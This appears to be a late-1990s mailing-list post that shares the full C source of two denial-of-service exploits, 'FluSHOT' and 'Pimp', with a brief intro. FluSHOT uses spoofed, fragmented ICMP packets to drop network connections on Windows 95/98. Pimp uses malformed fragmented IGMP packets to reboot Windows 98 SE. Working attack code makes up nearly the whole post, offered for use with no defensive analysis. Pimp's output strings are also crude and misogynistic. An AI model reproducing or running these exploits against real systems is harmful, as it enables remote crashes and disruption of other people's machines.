I got two exploits and tested them... - The first one is Flushot by DarkShow. This exploit can drop the network connection in Windows 95 and 98 (First Edition). - The other one is Pimp by Rob Mosher; this exploit can reboot Windows 98 SE. I have Red Hat Linux 5.0 installed.... Now... the exploits.. Sorry.. my English is shit... Have fun.. ----------[FluSHOT.c START CUT HERE]-------------------------------------------------- /* Lags CPU Made By DarkShadow from The flu Hacking Group Kills Win95-98 machines */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> void banner(void) { =20 printf("Remote Flushot v 1.0\n\n"); =20 =20 printf("\n\n"); } void usage(const char *progname) { printf(" usage:\n"); printf("./flushot [Spoofed IP] [Destination IP] [# of FLushot to = Send]\n",progname); printf(" [Spoofed IP] : ex: 205.56.78.0\n"); printf(" [Destination IP] : ex: 201.12.3.76\n"); printf(" [# of FLushot to Send] : 100\n"); printf("The Flu Hacking Group (c)\n"); printf("DarkShadow PlimoMan Hack The Planet\n"); } int resolve( const char *name, unsigned int port, struct sockaddr_in = *addr ) { struct hostent *host; memset(addr,0,sizeof(struct sockaddr_in)); addr->sin_family =3D AF_INET; addr->sin_addr.s_addr =3D inet_addr(name); if (addr->sin_addr.s_addr =3D=3D -1) { if (( host =3D gethostbyname(name) ) =3D=3D NULL ) { fprintf(stderr,"ERROR: Unable to resolve host %s\n",name); return(-1); } addr->sin_family =3D host->h_addrtype; memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length); } addr->sin_port =3D htons(port); return(0); } unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft =3D len; register u_short *w =3D addr; register int sum =3D 0; u_short answer =3D 0; while (nleft > 1) { sum +=3D *w++; nleft -=3D 2; } if (nleft =3D=3D 1) { *(u_char
*)(&answer) =3D *(u_char *)w ; sum +=3D answer; } sum =3D (sum >> 16) + (sum & 0xffff); sum +=3D (sum >> 16); =20 answer =3D ~sum; =20 return(answer); } int send_winbomb(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr) { unsigned char *packet; struct iphdr *ip; struct icmphdr *icmp; int rc; packet =3D (unsigned char *)malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip =3D (struct iphdr *)packet; icmp =3D (struct icmphdr *)(packet + sizeof(struct iphdr)); memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip->ihl =3D 5; ip->version =3D 4; // ip->tos =3D 2; ip->id =3D htons(1234); ip->frag_off |=3D htons(0x2000); // ip->tot_len =3D 0; ip->ttl =3D 30; ip->protocol =3D IPPROTO_ICMP; ip->saddr =3D spoof_addr; ip->daddr =3D dest_addr->sin_addr.s_addr; ip->check =3D in_cksum(ip, sizeof(struct iphdr)); icmp->type =3D 12; icmp->code =3D 0; icmp->checksum =3D in_cksum(icmp,sizeof(struct icmphdr) + = 1); if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + 1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) =3D=3D -1) { return(-1); } ip->tot_len =3D htons(sizeof(struct iphdr) + sizeof(struct icmphdr) = + 8); ip->frag_off =3D htons(8 >> 3); ip->frag_off |=3D htons(0x2000); ip->check =3D in_cksum(ip, sizeof(struct iphdr)); icmp->type =3D 0; icmp->code =3D 0; icmp->checksum =3D 0; if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + 8,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) =3D=3D -1) { return(-1); } free(packet); return(0); } int main(int argc, char * *argv) { struct sockaddr_in dest_addr; unsigned int i,sock; unsigned long src_addr; banner(); if ((argc !=3D 4)) { usage(argv[0]); return(-1); } if((sock =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { fprintf(stderr,"ERROR: Opening raw socket.\n"); return(-1); } if (resolve(argv[1],0,&dest_addr) =3D=3D -1) { return(-1); } src_addr =3D dest_addr.sin_addr.s_addr; if (resolve(argv[2],0,&dest_addr) =3D=3D -1) { 
return(-1); } printf("Status: Connected....packets sent.\n",argv[0]); for (i =3D 0;i < atoi(argv[3]);i++) { if (send_winbomb(sock, src_addr, &dest_addr) =3D=3D -1) { fprintf(stderr,"ERROR: Unable to Connect To luser.\n"); return(-1); } usleep(10000); } } ----------[FluSHOT.c END CUT = HERE]-------------------------------------------------- ----------[Pimp.c START CUT = HERE]-------------------------------------------------- /* ** pimp.c 6/4/99 by Rob Mosher: nytat_private ** exploits bug in m$'s ip stack ** rewrite by nyt@EFnet ** bug found by klepto ** usage: pimp <host> */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <time.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <sys/socket.h> struct igmp { unsigned char igmp_type; unsigned char igmp_code; unsigned short igmp_cksum; struct in_addr igmp_group; }; #define ERROR(a) {printf("ERROR: %s\n", a);exit(-1);} u_long resolve(char *); int main(int argc, char *argv[]) { int nsock, ctr; char *pkt, *data; struct ip *nip; struct igmp *nigmp; struct sockaddr_in s_addr_in; setvbuf(stdout, NULL, _IONBF, 0); printf("pimp.c by nyt\n"); if(argc !=3D 2) ERROR("usage: pimp <host>"); if((nsock =3D socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) =3D=3D -1) ERROR("could not create raw socket"); pkt =3D malloc(1500); if(!pkt) ERROR("could not allocate memory"); memset(&s_addr_in, 0, sizeof(s_addr_in)); memset(pkt, 0, 1500); nip =3D (struct ip *) pkt; nigmp =3D (struct igmp *) (pkt + sizeof(struct ip)); data =3D (char *)(pkt + sizeof(struct ip) + sizeof(struct igmp)); memset(data, 'A', 1500-(sizeof(struct ip) + sizeof(struct igmp))); s_addr_in.sin_addr.s_addr =3D resolve(argv[1]); nip->ip_v =3D 4; nip->ip_hl =3D 5; nip->ip_tos =3D 0; nip->ip_id =3D 69; nip->ip_ttl =3D 255; nip->ip_p =3D IPPROTO_IGMP; nip->ip_sum =3D 0; nip->ip_dst.s_addr =3D s_addr_in.sin_addr.s_addr; nip->ip_src.s_addr =3D 2147100000; nigmp->igmp_type =3D 2; nigmp->igmp_code =3D 31; 
nigmp->igmp_cksum =3D 0; inet_aton("128.1.1.1", &nigmp->igmp_group); printf("pimpin' dem trick-ass-bitches"); for(ctr =3D 0;ctr < 15;ctr++) { printf("."); nip->ip_len =3D 1500; nip->ip_off =3D htons(IP_MF); sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_off =3D htons(1480/8)|htons(IP_MF); sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_off =3D htons(5920/8)|htons(IP_MF); sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_len =3D 831; nip->ip_off =3D htons(7400/8); sendto(nsock, pkt, 831, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); usleep(500000); } printf("*slap* *slap* bitch, who yo daddy\n"); shutdown(nsock, 2); close(nsock); } u_long resolve(char *host) { struct hostent *he; u_long ret; if(!(he =3D gethostbyname(host))) { herror("gethostbyname()"); exit(-1); } memcpy(&ret, he->h_addr, sizeof(he->h_addr)); return ret; } ----------[Pimp.c END CUT = HERE]-------------------------------------------------- -- Hector Leon -- darksun@computer-maniacs.com --CiMOS Computers Rep. Dom.--